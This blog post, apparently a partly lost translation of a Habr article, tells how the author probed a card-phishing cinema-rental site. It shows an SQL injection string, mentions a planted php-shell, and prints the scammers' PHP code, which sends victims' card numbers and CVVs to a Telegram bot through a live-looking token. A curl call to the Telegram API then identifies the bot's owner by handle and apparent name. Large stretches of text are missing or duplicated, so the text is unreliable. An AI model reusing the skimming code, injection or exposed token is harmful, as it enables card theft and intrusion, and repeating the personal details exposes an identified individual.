How I caught a hacker
annotation
Each of us may become a victim of an attacker, but sometimes the predator and the prey change places.
This is a brief history of how the misuse of technology can lead to the disclosure of personality. The article will be useful both for young hackers who want to get “easy money” and for those who want to catch them.
Introduction
One February evening I was busy searching for a place for a romantic date with my beloved. After some time, my attention was attracted by the site milleniumfilm.ru , which is not currently available. The site provided rental services of small cinemas for private viewing. Beautiful pictures, reasonable prices, there is online support, one thing: a bank card data was suggested to be entered on a non-secure page of the same domain. Wary, I wrote to the technical support of the site, and the scammers did not take long to understand - realizing that I was quite technically competent, they sent me to 3 letters. Of course, fraudsters do not need to waste time on me, but why so rude? - In any situation, you need to remain a man.
')
With reviews of sites of the same plan can be found here: zhaloba-online.ru . Some of them even still work.
Breaking into
Feeling a universal injustice, in order to identify the attacker and prevent his activities, I began to study the site for vulnerabilities.
Screenshot
1' or '1.
.
, .
Gelloiss.ru . « » — : , , , cvc2 .
. .
.
, 3D-secure, . , . , 3D-secure . , , .
« » - . , php-shell. /images/, login.php. , .
.
telegram.php.
.
$ cat telegram.php
<?
function send_mess($text) {
$token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
$mess = $text;
$chat = "-302359340";
/*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}PHP - send_mess. , - , .
grep
./cart.php:22:send_mess(" : ".$name."%0D%0AEmail: ".$email."%0D%0A: ".$phone."%0D%0A : ".$date."%0D%0A".": ".$time."%0D%0A: ".$city."%0D%0A: ".$sum."%0D%0A : ".$services."%0D%0AIP: ".$ip."%0D%0A: ".$link_ban_ip);
./pay/ms.php:21: send_mess(": ".$sum."%0D%0A : ".$name."%0D%0A : ".$num."%0D%0A , : ".$month."%0D%0A: ".$year."%0D%0Acvv: ".$cvv);, -, chat_id, skype «ura7887» telegram «Gelloiss» ( telegram , telegram- ).
gelloiss.ru
, , .
curl
$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}username — «gelloiss».
: ! : «gelloiss», «ura7887», , «Gelloiss.ru», skype «ura7887».
.
: vk.com , 6 , 14 .
.
anime.anidub.com.
.
blackhacker.ru, .
.
telegram
, Gelloiss.ru telegram, telegram- . , telegram- .
shell
$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 -telegram :
telegram
, . , 100 , +100.
, «». « » .
, . : 3 - 13 . , - , 2 . , , . , moneyonline.world.
Update 2019-04-21: gelloiss , , , telegram:
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message=' « » ', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\n ?)) \n ', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ , . , , . , .', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | , , ', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\n ?)) \n ', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ , . , , . , .', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | , , ', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Source: https://habr.com/ru/post/448810/
All Articles